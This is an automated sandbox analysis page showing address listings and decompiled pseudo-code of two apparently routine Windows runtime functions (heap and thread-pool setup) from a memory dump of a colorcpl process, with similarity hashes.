0x0434d85a
0x0434da26
0x0434d9a0
0x0434d9a0
0x0434d80c
0x0434d814
0x0434d814
0x0434d863
0x0434d872
0x0434d877
0x0434d87f
0x0434d883
0x0434d9f2
0x0434d9f2
0x0434d9f7
0x0434d9f9
0x0434d9fc
0x00000000
0x0434d9fc
0x0434d897
0x0434d89c
0x0434d89f
0x0434d8a1
0x0434d8a5
0x0434d8a7
0x0434d8aa
0x0434d8b1
0x0434d8b4
0x0434d8b6
0x0434d8b8
0x0434d8bd
0x0434d8bd
0x0434d8bf
0x0434d8c2
0x0434d8c2
0x0434d8d0
0x0434d8d5
0x0434d8d8
0x0434d8da
0x043a3ff9
0x043a3ff9
0x043a3ffb
0x00000000
0x00000000
0x00000000
0x0434d8e0
0x0434d8e0
0x0434d8e4
0x0434d8e9
0x0434d8ec
0x043a3fd6
0x043a3fdb
0x043a3fde
0x043a3fae
0x043a3fba
0x043a3fbf
0x043a3fc1
0x043a3fcd
0x043a3fcd
0x0434d99b
0x0434d99b
0x0434d99e
0x00000000
0x0434d99e
0x043a3fc3
0x043a3fc7
0x00000000
0x00000000
0x00000000
0x043a3fc7
0x043a3fe0
0x043a3ff1
0x043a3ff6
0x00000000
0x043a3ff6
0x0434d8f2
0x0434d8f6
0x00000000
0x00000000
0x0434d8fc
0x0434d902
0x0434d904
0x00000000
0x00000000
0x0434d90a
0x0434d90e
0x0434d914
0x0434d917
0x043a3f94
0x043a3f97
0x00000000
0x00000000
0x043a3fa8
0x043a3faa
0x043a3fac
0x043a3ffd
0x043a3ffd
0x0434d920
0x0434d920
0x0434d922
0x00000000
0x00000000
0x0434d928
0x0434d92a
0x00000000
0x00000000
0x0434d930
0x0434d933
0x0434d93d
0x0434d945
0x0434d949
0x0434d94c
0x0434d95c
0x0434d95c
0x0434d95f
0x00000000
0x00000000
0x0434d965
0x0434d968
0x0434d96a
0x00000000
0x00000000
0x0434d970
0x0434d973
0x0434d975
0x00000000
0x00000000
0x0434d97b
0x0434d97e
0x0434d986
0x0434d988
0x00000000
0x00000000
0x0434d98a
0x0434d997
0x0434d999
0x00000000
0x00000000
0x00000000
0x0434d999
0x0434d953
0x0434d956
0x00000000
0x00000000
0x00000000
0x0434d956
0x0434d935
0x0434d937
0x00000000
0x00000000
0x00000000
0x0434d937
0x00000000
0x043a3fac
0x0434d91d
0x0434d91d
0x0434d91d
0x00000000
0x0434d91d
0x0434d8da
0x0434d82f
0x0434d832
0x0434d835
0x0434d837
0x00000000
0x00000000
0x0434d83d
0x0434d841
0x00000000
0x00000000
0x0434d847
0x0434d849
0x00000000
0x00000000
0x0434d852
0x00000000
0x0434d852
0x0434d74e
0x0434d753
0x0434d75b
0x0434d7e6
0x0434d7e8
0x0434d7ed
0x0434d7f2
0x0434d7f6
0x0434d7fb
0x0434d9a7
0x0434d9aa
0x043a3efd
0x043a3f02
0x043a3f02
0x043a3f05
0x043a3f36
0x043a3f36
0x043a3f39
0x043a3f3c
0x043a3f3c
0x043a3f3f
0x043a3f41
0x043a3f44
0x043a3f47
0x043a3f4a
0x043a3f4d
0x043a3f4f
0x043a3f4f
0x043a3f51
0x043a3f5b
0x043a3f5d
0x043a3f61
0x043a3f64
0x043a3f66
0x00000000
0x00000000
0x043a3f68
0x043a3f68
0x043a3f6c
0x043a3f70
0x043a3f73
0x043a3f76
0x043a3f76
0x043a3f7d
0x043a3f7d
0x043a3f82
0x00000000
0x043a3f82
0x043a3f09
0x043a3f0c
0x043a3f0f
0x043a3f11
0x043a3f1c
0x043a3f1f
0x043a3f25
0x043a3f27
0x00000000
0x00000000
0x043a3f2d
0x00000000
0x00000000
0x00000000
0x00000000
0x043a3f13
0x043a3f13
0x043a3f13
0x043a3f15
0x043a3f18
0x043a3f18
0x00000000
0x043a3f13
0x0434d9b0
0x0434d9b3
0x00000000
0x00000000
0x0434d9c0
0x0434d9c2
0x0434d9d2
0x0434d9d4
0x0434d9d6
0x0434d9d8
0x0434d9dc
0x0434d9df
0x0434d9e1
0x00000000
0x00000000
0x0434d9e7
0x0434d9e9
0x0434d9eb
0x00000000
0x00000000
0x00000000
0x0434d9ed
0x0434d9c0
0x0434d801
0x0434d801
0x0434d806
0x0434da03
0x0434da0a
0x00000000
0x00000000
0x0434da10
0x0434da17
0x0434da1b
0x00000000
0x00000000
0x00000000
0x0434da21
0x00000000
0x0434d806
0x0434d761
0x0434d766
0x0434d766
0x0434d76b
0x043a3ef0
0x043a3ef0
0x00000000
0x00000000
0x00000000
0x00000000
0x0434d771
0x0434d771
0x0434d774
0x0434d77b
0x0434d780
0x0434d786
0x0434d7a0
0x0434d7a3
0x0434d7a5
0x00000000
0x00000000
0x0434d7ab
0x00000000
0x0434d7ab
0x0434d78d
0x0434d792
0x0434d7b2
0x0434d7b5
0x0434d7ba
0x0434d7c0
0x0434d7cb
0x0434d7dd
0x0434d7df
0x0434d7df
0x0434d7e1
0x0434d7e4
0x00000000
0x0434d7e4
0x0434d794
0x0434d797
0x0434d797
0x00000000

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd48ed163c52d2d4a1b2d6151d48ff94f6ba0c9f0d5f6675c1d17a1b6298a967
Instruction ID: f78c9ab5343d0db07124ab50f1af0a10051025f53b880e9bb31d1917e9e152ed
Opcode Fuzzy Hash: cd48ed163c52d2d4a1b2d6151d48ff94f6ba0c9f0d5f6675c1d17a1b6298a967
Instruction Fuzzy Hash: 17C1B071E106169BEB28CF58C841BEEB7F6EF84714F149269E825EB280D774F951CB80

Uniqueness

Uniqueness Score: -1.00%

Function 04381763 Relevance: .3, Instructions: 322
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E04381763(intOrPtr __ecx, intOrPtr __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t156;
				void* _t164;
				signed int _t169;
				signed int _t170;
				signed int _t171;
				signed int _t187;
				signed int _t191;
				signed int _t192;
				signed int _t193;
				void* _t195;
				signed char _t199;
				intOrPtr* _t208;
				intOrPtr _t209;
				intOrPtr _t210;
				intOrPtr _t211;
				intOrPtr* _t212;
				intOrPtr* _t213;
				void* _t233;
				signed int _t236;
				intOrPtr _t242;
				signed int _t243;
				signed int _t246;
				signed int _t250;
				intOrPtr _t253;
				signed int _t255;
				intOrPtr _t260;
				signed int _t261;

				_v20 = __edx;
				_t251 = _a8;
				_v16 = __ecx;
				_v12 = 1;
				if(_a8 != 0) {
					E04411933(_t251, _a12,  &_a4,  &_v12);
				}
				while(1) {
					_t236 =  *0x7ffe0018;
					_t246 =  *0x7FFE0014;
					_t156 =  *((intOrPtr*)(0x7ffe001c));
					if(_t236 == _t156) {
						break;
					}
					asm("pause");
				}
				_t260 = _v16;
				_v56 = _t246;
				_v52 = _t236;
				if( *((intOrPtr*)(_t260 + 0x28)) != 2) {
					__eflags =  *((intOrPtr*)(_t260 + 0x28)) - 3;
					if( *((intOrPtr*)(_t260 + 0x28)) != 3) {
						_v40 = _v40 & 0x00000000;
						_v36 = _v36 & 0x00000000;
						E0436BC50( &_v40);
						_v48 = _v40;
						_v44 = _v36;
					} else {
						asm("rdtsc");
						_v48 = _t156;
						_v44 = _t246;
					}
					goto L7;
				} else {
					while(1) {
						_t236 =  *0x7ffe0018;
						_t250 =  *0x7FFE0014;
						if(_t236 ==  *0x7ffe001c) {
							break;
						}
						asm("pause");
					}
					_t260 = _v16;
					_v48 = _t250;
					_v44 = _t236;
					L7:
					_t164 = E04355D90(_t236,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x188 + _a4 * 4);
					_t253 = _a8;
					_t233 = _t164;
					if(_t233 == 0) {
						L28:
						return 0;
					}
					_t169 = E04355D90(_t236,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _a4 << 2);
					 *(_t233 + 0x178) = _t169;
					if(_t169 == 0) {
						L46:
						_t261 = 0;
						__eflags = 0;
						L47:
						__eflags =  *(_t233 + 0x64);
						if( *(_t233 + 0x64) != 0) {
							_push( *(_t233 + 0x64));
							E04382A80();
							 *(_t233 + 0x64) = _t261;
						}
						__eflags =  *(_t233 + 0x60);
						if( *(_t233 + 0x60) != 0) {
							_push( *(_t233 + 0x60));
							E04382A80();
							 *(_t233 + 0x60) = _t261;
						}
						_t170 =  *(_t233 + 0x164);
						__eflags = _t170;
						if(_t170 != 0) {
							E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t261, _t170);
						}
						_t171 =  *(_t233 + 0x178);
						__eflags = _t171;
						if(_t171 != 0) {
							E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t261, _t171);
						}
						E0437E4BC(_t233);
						_t147 = _t233 + 0x6c; // 0x6c
						E04353B90(_t147);
						_t148 = _t233 + 0x74; // 0x74
						E04353B90(_t148);
						_t149 = _t233 + 0x7c; // 0x7c
						E04353B90(_t149);
						E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t261, _t233);
						goto L28;
					}
					if(_t253 != 0) {
						_t238 = _t233;
						_t254 = _v12;
						_t187 = E044117BC(_t233, _v12, _t253, _a12);
						__eflags = _t187;
						if(_t187 != 0) {
							goto L46;
						}
						_t191 = E04355D90(_t238,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, (_t254 & 0x0000ffff) * 0xc);
						 *(_t233 + 0x164) = _t191;
						__eflags = _t191;
						if(__eflags == 0) {
							goto L46;
						}
						_t255 = _a4;
						L12:
						_t192 =  *(_t260 + 0x30);
						_t274 = _t192;
						if(_t192 != 0) {
							__eflags = _t192 - 0x4000;
							if(__eflags > 0) {
								 *(_t260 + 0x30) = 0x4000;
								_t192 = 0x4000;
							}
							_t193 = _t192 << 0xa;
						} else {
							_t193 = 0x1000;
						}
						 *(_t233 + 0x8c) = _t193;
						_t32 = _t233 + 0x6c; // 0x6c
						_push( *((intOrPtr*)(_t260 + 0x94)));
						_t195 = E043640F0(_t233, _t255, _t260, _t274);
						_t275 = _t195;
						if(_t195 == 0 || E04381A3B(_t260,  *((intOrPtr*)(_t260 + 0x60)), _t275,  &_v28) != 0) {
							goto L46;
						} else {
							if(( *(_t260 + 0x40) & 0x00004000) != 0) {
								 *((intOrPtr*)(_t233 + 0x11c)) = 0x44341d8;
							} else {
								if(( *(_t260 + 0x40) & 0x00008000) != 0) {
									_t125 = _t233 + 0x120; // 0x120
									 *((intOrPtr*)(_t233 + 0x11c)) = _t125;
								}
							}
							_t241 = 0x800;
							 *((intOrPtr*)(_t233 + 0x14)) = _v20;
							 *(_t233 + 0x88) = _t255;
							 *(_t233 + 0xd4) = 0x800;
							 *((intOrPtr*)(_t233 + 0x2c)) = 0xffff;
							 *((intOrPtr*)(_t233 + 0x28)) = 0xc00d0000;
							 *((intOrPtr*)(_t233 + 0x24)) = 0xc0120000;
							_t199 =  *(_t260 + 0x40);
							if((_t199 & 0x00000400) != 0) {
								_t241 = 0xc00;
								 *(_t233 + 0xd4) = 0xc00;
								goto L22;
							} else {
								if((_t199 & 0x00000002) == 0) {
									__eflags = _t199 & 0x00000008;
									if((_t199 & 0x00000008) == 0) {
										__eflags = _t199 & 0x00000001;
										if((_t199 & 0x00000001) == 0) {
											L22:
											_t242 = _v16;
											 *(_t233 + 0xd4) =  *(_t260 + 0x40) & 0x34133024 | _t241;
											 *((intOrPtr*)(_t233 + 0x118)) =  *((intOrPtr*)(_t260 + 0x6c));
											 *((intOrPtr*)(_t233 + 0xa0)) =  *((intOrPtr*)(_t233 + 0x9c));
											asm("movsd");
											asm("movsd");
											asm("movsd");
											asm("movsd");
											_t261 = 0;
											 *((intOrPtr*)(_t233 + 0xd0)) =  *((intOrPtr*)(_t242 + 0x3c));
											 *((intOrPtr*)(_t233 + 0x94)) =  *((intOrPtr*)(_t242 + 0x38));
											 *((intOrPtr*)(_t233 + 0x98)) =  *((intOrPtr*)(_t242 + 0x34));
											_t73 = _t233 + 0xa4; // 0xa4
											_t208 = _t73;
											 *((intOrPtr*)(_t208 + 4)) = _t208;
											 *_t208 = _t208;
											_t75 = _t233 + 0xb4; // 0xb4
											_t209 = _t75;
											 *((intOrPtr*)(_t233 + 0xb4)) = 0;
											 *((intOrPtr*)(_t233 + 0xac)) = _t209;
											 *((intOrPtr*)(_t233 + 0xb0)) = _t209;
											_t79 = _t233 + 0xc0; // 0xc0
											_t210 = _t79;
											 *((intOrPtr*)(_t233 + 0xc0)) = 0;
											 *((intOrPtr*)(_t233 + 0xb8)) = _t210;
											 *((intOrPtr*)(_t233 + 0xbc)) = _t210;
											_t83 = _t233 + 0xcc; // 0xcc
											_t211 = _t83;
											 *((intOrPtr*)(_t233 + 0xcc)) = 0;
											 *((intOrPtr*)(_t233 + 0xc4)) = _t211;
											 *((intOrPtr*)(_t233 + 0xc8)) = _t211;
											_t87 = _t233 + 0x14c; // 0x14c
											_t212 = _t87;
											 *((intOrPtr*)(_t212 + 4)) = _t212;
											 *_t212 = _t212;
											_t89 = _t233 + 0x154; // 0x154
											_t213 = _t89;
											 *((intOrPtr*)(_t213 + 4)) = _t213;
											 *_t213 = _t213;
											_push(0);
											 *((intOrPtr*)(_t233 + 0x10)) =  *((intOrPtr*)(_t242 + 0x28));
											_push(1);
											 *((intOrPtr*)(_t233 + 0x40)) =  *((intOrPtr*)(_t242 + 0x60));
											_push(0);
											 *((intOrPtr*)(_t233 + 0x100)) =  *((intOrPtr*)(_t242 + 0x4c));
											_t97 = _t233 + 0x60; // 0x60
											_push(0x1f0003);
											if(E04382E30() < 0) {
												goto L47;
											}
											_push(0);
											_push(1);
											_push(0);
											_push(0x1f0003);
											_t98 = _t233 + 0x64; // 0x64
											if(E04382E30() < 0) {
												goto L47;
											}
											_t99 = _t233 + 0x48; // 0x48
											E0436FBC0(_t99, 0, 0);
											 *((intOrPtr*)(_t233 + 0x44)) = 0;
											 *((intOrPtr*)(_t233 + 0xd8)) = 1;
											asm("movsd");
											asm("movsd");
											asm("movsd");
											asm("movsd");
											return _t233;
										}
										_t241 = 0x801;
										L21:
										 *(_t233 + 0xd4) = _t241;
										 *((intOrPtr*)(_t233 + 0x74)) = _v28;
										 *((intOrPtr*)(_t233 + 0x78)) = _v24;
										goto L22;
									}
									_t241 = 0x808;
									 *(_t233 + 0xd4) = 0x808;
									 *((intOrPtr*)(_t233 + 0x7c)) = _v28;
									 *((intOrPtr*)(_t233 + 0x80)) = _v24;
									goto L22;
								}
								_t241 = 0x802;
								goto L21;
							}
						}
					}
					_t255 = _a4;
					_t243 = 0;
					if(_t255 == 0) {
						goto L12;
					} else {
						goto L11;
					}
					do {
						L11:
						 *((short*)( *(_t233 + 0x178) + _t243 * 4)) = 0;
						 *( *(_t233 + 0x178) + 2 + _t243 * 4) = _t243;
						_t243 = _t243 + 1;
					} while (_t243 < _t255);
					goto L12;
				}
			}

0x0438176f
0x04381773
0x04381777
0x0438177a
0x04381780
0x043b9b84
0x043b9b84
0x04381791
0x04381791
0x04381793
0x04381795
0x04381799
0x00000000
0x00000000
0x04381a29
0x04381a29
0x0438179f
0x043817a2
0x043817a5
0x043817ac
0x043b9b8e
0x043b9b92
0x043b9ba1
0x043b9ba8
0x043b9bad
0x043b9bb5
0x043b9bbb
0x043b9b94
0x043b9b94
0x043b9b96
0x043b9b99
0x043b9b99
0x00000000
0x043817b2
0x043817b7
0x043817b7
0x043817b9
0x043817bf
0x00000000
0x00000000
0x04381a30
0x04381a30
0x043817c5
0x043817c8
0x043817cb
0x043817ce
0x043817e4
0x043817e9
0x043817ec
0x043817f0
0x04381a37
0x00000000
0x04381a37
0x04381808
0x0438180d
0x04381815
0x043b9c7c
0x043b9c7c
0x043b9c7c
0x043b9c7e
0x043b9c7e
0x043b9c82
0x043b9c84
0x043b9c87
0x043b9c8c
0x043b9c8c
0x043b9c8f
0x043b9c93
0x043b9c95
0x043b9c98
0x043b9c9d
0x043b9c9d
0x043b9ca0
0x043b9ca6
0x043b9ca8
0x043b9cb5
0x043b9cb5
0x043b9cba
0x043b9cc0
0x043b9cc2
0x043b9ccf
0x043b9ccf
0x043b9cd6
0x043b9cdb
0x043b9cdf
0x043b9ce4
0x043b9ce8
0x043b9ced
0x043b9cf1
0x043b9d01
0x00000000
0x043b9d01
0x0438181d
0x043b9bc6
0x043b9bc9
0x043b9bd0
0x043b9bd5
0x043b9bd7
0x00000000
0x00000000
0x043b9bef
0x043b9bf4
0x043b9bfa
0x043b9bfc
0x00000000
0x00000000
0x043b9bfe
0x04381848
0x04381848
0x04381850
0x04381852
0x043b9c06
0x043b9c08
0x043b9c0a
0x043b9c0d
0x043b9c0d
0x043b9c0f
0x04381858
0x04381858
0x04381858
0x0438185d
0x04381863
0x04381866
0x0438186d
0x04381872
0x04381874
0x00000000
0x04381890
0x04381897
0x043b9c17
0x0438189d
0x043818a4
0x043b9c26
0x043b9c2c
0x043b9c2c
0x043818a4
0x043818ad
0x043818b2
0x043818b5
0x043818bb
0x043818c1
0x043818c8
0x043818cf
0x043818d6
0x043818de
0x043b9c37
0x043b9c3c
0x00000000
0x043818e4
0x043818e6
0x043b9c47
0x043b9c49
0x043b9c6a
0x043b9c6c
0x04381901
0x0438190e
0x04381911
0x0438191d
0x04381929
0x0438192f
0x04381930
0x04381931
0x04381932
0x04381936
0x04381938
0x04381946
0x0438194f
0x04381955
0x04381955
0x0438195b
0x0438195e
0x04381960
0x04381960
0x04381966
0x0438196c
0x04381972
0x04381978
0x04381978
0x0438197e
0x04381984
0x0438198a
0x04381990
0x04381990
0x04381996
0x0438199c
0x043819a2
0x043819a8
0x043819a8
0x043819ae
0x043819b1
0x043819b3
0x043819b3
0x043819b9
0x043819bc
0x043819c1
0x043819c2
0x043819c8
0x043819ca
0x043819d0
0x043819d1
0x043819d7
0x043819da
0x043819e3
0x00000000
0x00000000
0x043819e9
0x043819ea
0x043819ec
0x043819ed
0x043819ee
0x043819f9
0x00000000
0x00000000
0x04381a01
0x04381a05
0x04381a0a
0x04381a12
0x04381a1e
0x04381a1f
0x04381a20
0x04381a21
0x00000000
0x04381a21
0x043b9c72
0x043818ef
0x043818ef
0x043818f8
0x043818fe
0x00000000
0x043818fe
0x043b9c4b
0x043b9c50
0x043b9c59
0x043b9c5f
0x00000000
0x043b9c5f
0x043818ec
0x00000000
0x043818ec
0x043818de
0x04381874
0x04381823
0x04381826
0x0438182a
0x00000000
0x00000000
0x00000000
0x00000000
0x0438182c
0x0438182c
0x04381834
0x0438183e
0x04381843
0x04381844
0x00000000
0x0438182c

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb1e843c88965ec957209466c095e95db38a2f0bc11d9b04c4e6221580acff14
Instruction ID: 82eefbacf021eed4bc1522c2682121a23f9d42f3d7d67040839376aef455e9c6
Opcode Fuzzy Hash: cb1e843c88965ec957209466c095e95db38a2f0bc11d9b04c4e6221580acff14
Instruction Fuzzy Hash: 4AD116B1A006059FDB51DF68C980B96BBF9FF08344F1451BAEE49DB616E734E901CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 043437E4 Relevance: .3, Instructions: 303
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E043437E4(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t108;
				intOrPtr _t111;
				intOrPtr _t112;
				char* _t122;
				signed short* _t132;
				signed short _t133;
				signed int _t134;
				intOrPtr _t135;
				signed int _t139;
				signed int _t140;
				intOrPtr* _t145;
				intOrPtr* _t146;
				intOrPtr* _t147;
				intOrPtr* _t151;
				intOrPtr _t154;
				intOrPtr* _t157;
				intOrPtr _t170;
				intOrPtr _t172;
				signed int _t173;
				signed int _t174;
				intOrPtr _t175;
				intOrPtr _t178;
				signed short _t182;
				signed short _t183;
				signed int _t192;
				intOrPtr* _t195;
				short _t197;
				intOrPtr _t199;
				intOrPtr* _t202;
				intOrPtr _t203;
				void* _t204;

				_push(0x58);
				_push(0x441bc28);
				E04397BE4(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t204 - 0x50)) = __ecx;
				 *((intOrPtr*)(_t204 - 0x1c)) = 0xc0000001;
				 *((intOrPtr*)(_t204 - 0x24)) = 0;
				 *((intOrPtr*)(__ecx)) = 0;
				 *(_t204 - 0x2c) = __edx & 0x00000001;
				_t108 = E0434B920(__ecx,  *((intOrPtr*)( *[fs:0x30] + 8)));
				if(_t108 == 0) {
					_t197 = 0xc000007b;
					L33:
					 *[fs:0x0] =  *((intOrPtr*)(_t204 - 0x10));
					return _t197;
				}
				_t168 =  *((intOrPtr*)(_t108 + 0x60));
				 *((intOrPtr*)(_t204 - 0x40)) =  *((intOrPtr*)(_t108 + 0x60));
				_t199 =  *((intOrPtr*)(_t108 + 0x64));
				 *((intOrPtr*)(_t204 - 0x34)) = _t199;
				_t111 =  *((intOrPtr*)( *[fs:0x30] + 0x208));
				if(_t111 != 0) {
					if(_t199 < _t111) {
						 *((intOrPtr*)(_t204 - 0x34)) = _t111;
					}
				}
				_t112 =  *0x4436644; // 0x0
				_t202 = E04355D90(_t168,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t112 + 0x000c0000 | 0x00000008, 0x120);
				 *((intOrPtr*)(_t204 - 0x20)) = _t202;
				 *((intOrPtr*)(_t204 - 4)) = 0;
				 *((intOrPtr*)(_t204 - 0x4c)) = 1;
				if(_t202 == 0) {
					L41:
					_t197 = 0xc0000017;
					 *((intOrPtr*)(_t204 - 0x1c)) = 0xc0000017;
					goto L29;
				} else {
					_t170 =  *0x4436644; // 0x0
					_t171 = _t170 + 0xc0000;
					 *((intOrPtr*)(_t204 - 0x54)) = _t170 + 0xc0000;
					_t172 = E04355D90(_t170 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t171,  *0x4436640 * 0x24);
					 *((intOrPtr*)(_t204 - 0x24)) = _t172;
					if(_t172 == 0) {
						_t197 = 0xc0000017;
						 *((intOrPtr*)(_t204 - 0x1c)) = 0xc0000017;
						_t202 =  *((intOrPtr*)(_t204 - 0x20));
						L29:
						 *((intOrPtr*)(_t204 - 4)) = 0xfffffffe;
						 *((intOrPtr*)(_t204 - 0x4c)) = 0;
						E04343BA4(_t116, 0, _t197, _t202);
						if(_t197 < 0) {
							goto L33;
						}
						 *((intOrPtr*)( *((intOrPtr*)(_t204 - 0x50)))) = _t202;
						if(E04353C40() != 0) {
							_t122 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							_t197 =  *((intOrPtr*)(_t204 - 0x1c));
							_t202 =  *((intOrPtr*)(_t204 - 0x20));
						} else {
							_t122 = 0x7ffe0386;
						}
						if( *_t122 != 0) {
							L37:
							E04414DA7(_t202);
						}
						goto L33;
					}
					_t173 = 0;
					 *(_t204 - 0x28) = 0;
					_t203 =  *((intOrPtr*)(_t204 - 0x20));
					_t192 =  *0x4436640; // 0x1
					while(_t173 < 3) {
						 *((intOrPtr*)(_t203 + 0x10 + _t173 * 4)) = _t192 * _t173 * 0xc +  *((intOrPtr*)(_t204 - 0x24));
						_t173 = _t173 + 1;
						 *(_t204 - 0x28) = _t173;
					}
					_t174 = 0;
					while(1) {
						 *(_t204 - 0x28) = _t174;
						if(_t174 >= _t192 * 3) {
							break;
						}
						_t157 = _t174 * 0xc +  *((intOrPtr*)(_t204 - 0x24));
						 *((intOrPtr*)(_t157 + 8)) = 0;
						 *((intOrPtr*)(_t157 + 4)) = _t157;
						 *_t157 = _t157;
						_t174 = _t174 + 1;
					}
					_t175 =  *0x4436644; // 0x0
					_t176 = _t175 + 0xc0000;
					 *(_t204 - 0x58) = _t175 + 0xc0000;
					_t116 = E04355D90(_t176 | 0x00000008,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t176 | 0x00000008, _t192 << 2);
					_t202 =  *((intOrPtr*)(_t204 - 0x20));
					 *((intOrPtr*)(_t202 + 0x1c)) = _t116;
					if(_t116 == 0) {
						goto L41;
					}
					_t178 =  *0x4436644; // 0x0
					_t179 = _t178 + 0xc0000;
					 *(_t204 - 0x5c) = _t178 + 0xc0000;
					_t116 = E04355D90(_t179 | 0x00000008,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t179 | 0x00000008,  *0x4436640 * 0xc);
					_t202 =  *((intOrPtr*)(_t204 - 0x20));
					 *((intOrPtr*)(_t202 + 0x20)) = _t116;
					if(_t116 == 0) {
						goto L41;
					}
					_t37 = _t202 + 0x110; // 0x110
					_t132 = _t37;
					 *(_t204 - 0x3c) = _t132;
					_t133 =  *_t132;
					 *(_t204 - 0x30) = _t133;
					if(_t133 == 0) {
						_t133 =  *0x7ffe03c0;
						 *(_t204 - 0x30) = _t133;
					}
					 *(_t204 - 0x38) = _t133;
					_t202 =  *((intOrPtr*)(_t204 - 0x20));
					 *(_t202 + 0x100) = _t133;
					_t197 = L04343722(_t202);
					 *((intOrPtr*)(_t204 - 0x1c)) = _t197;
					if(_t197 < 0) {
						goto L29;
					} else {
						 *((intOrPtr*)(_t202 + 0x104)) = 0xfffffffe;
						 *(_t204 - 0x68) = 0;
						 *((intOrPtr*)(_t204 - 0x64)) = 0;
						_t182 =  *(_t204 - 0x30);
						_t134 = _t182 & 0x0000ffff;
						 *(_t204 - 0x68) = _t134;
						 *(_t202 + 8) = _t134;
						 *((intOrPtr*)(_t202 + 0xc)) = 0;
						 *_t202 = 1;
						if(_t182 < 4) {
							_t183 = 4;
						} else {
							_t183 = _t182 + 1;
						}
						 *(_t204 - 0x30) = _t183;
						_t53 = _t202 + 0x28; // 0x28
						_t135 = _t53;
						 *((intOrPtr*)(_t204 - 0x44)) = _t135;
						_push(_t183);
						_push(0);
						_push(0x1f0003);
						_push(_t135);
						_t197 = E04383470();
						 *((intOrPtr*)(_t204 - 0x1c)) = _t197;
						if(_t197 < 0) {
							goto L29;
						} else {
							 *((intOrPtr*)(_t204 - 4)) = 1;
							 *((intOrPtr*)(_t204 - 0x48)) = 1;
							_t139 =  *( *(_t204 - 0x3c));
							if(_t139 == 0) {
								_t139 =  *0x7ffe03c0;
							}
							_t140 = _t139 << 2;
							if(_t140 < 0x200) {
								_t140 = 0x200;
							}
							_t202 =  *((intOrPtr*)(_t204 - 0x20));
							_t60 = _t202 + 0x24; // 0x24
							_push( *((intOrPtr*)(_t204 - 0x34)));
							_push( *((intOrPtr*)(_t204 - 0x40)));
							_push(_t140);
							_push(_t202);
							_push(E043458E0);
							_push(0xffffffff);
							_push( *((intOrPtr*)( *((intOrPtr*)(_t204 - 0x44)))));
							_push(0);
							_push(0xf00ff);
							_t197 = E04383670();
							 *((intOrPtr*)(_t204 - 0x1c)) = _t197;
							if(_t197 < 0) {
								L28:
								 *((intOrPtr*)(_t204 - 4)) = 0;
								 *((intOrPtr*)(_t204 - 0x48)) = 0;
								_t116 = E04343B92(_t142, 0, _t197, _t202);
								goto L29;
							} else {
								if( *(_t204 - 0x2c) != 0) {
									_push(4);
									_push(_t204 - 0x2c);
									_push(0xd);
									_push( *((intOrPtr*)(_t202 + 0x24)));
									_t197 = E043843A0();
									 *((intOrPtr*)(_t204 - 0x1c)) = _t197;
									if(_t197 < 0) {
										goto L28;
									}
									 *((short*)(_t202 + 0xe6)) =  *(_t204 - 0x2c);
								}
								 *((intOrPtr*)(_t202 + 0x2c)) = 0;
								 *((intOrPtr*)(_t202 + 0xe0)) = 0;
								 *((intOrPtr*)(_t202 + 0x114)) = 0;
								 *((short*)(_t202 + 0xe4)) = 0;
								_t70 = _t202 + 0x30; // 0x30
								_t145 = _t70;
								 *((intOrPtr*)(_t145 + 4)) = _t145;
								 *_t145 = _t145;
								_t72 = _t202 + 0x38; // 0x38
								_t146 = _t72;
								 *((intOrPtr*)(_t146 + 4)) = _t146;
								 *_t146 = _t146;
								_t74 = _t202 + 0x118; // 0x118
								_t147 = _t74;
								 *((intOrPtr*)(_t147 + 4)) = _t147;
								 *_t147 = _t147;
								E04344A09(_t202, _t204 - 0x60, 0);
								_t202 =  *((intOrPtr*)(_t204 - 0x20));
								 *((intOrPtr*)(_t202 + 0xf0)) =  *((intOrPtr*)(_t204 + 4));
								_t80 = _t202 + 0x40; // 0x40
								_t197 = E04344077(_t80, _t202);
								 *((intOrPtr*)(_t204 - 0x1c)) = _t197;
								if(_t197 < 0) {
									goto L28;
								}
								_t197 = 0;
								 *((intOrPtr*)(_t204 - 0x1c)) = 0;
								L04352330(_t142, 0x4436884);
								 *((intOrPtr*)(_t204 - 4)) = 2;
								_t84 = _t202 + 0xe8; // 0xe8
								_t151 = _t84;
								_t195 =  *0x4433424; // 0x27123e8
								if( *_t195 != 0x4433420) {
									_push(3);
									asm("int 0x29");
									goto L37;
								}
								 *_t151 = 0x4433420;
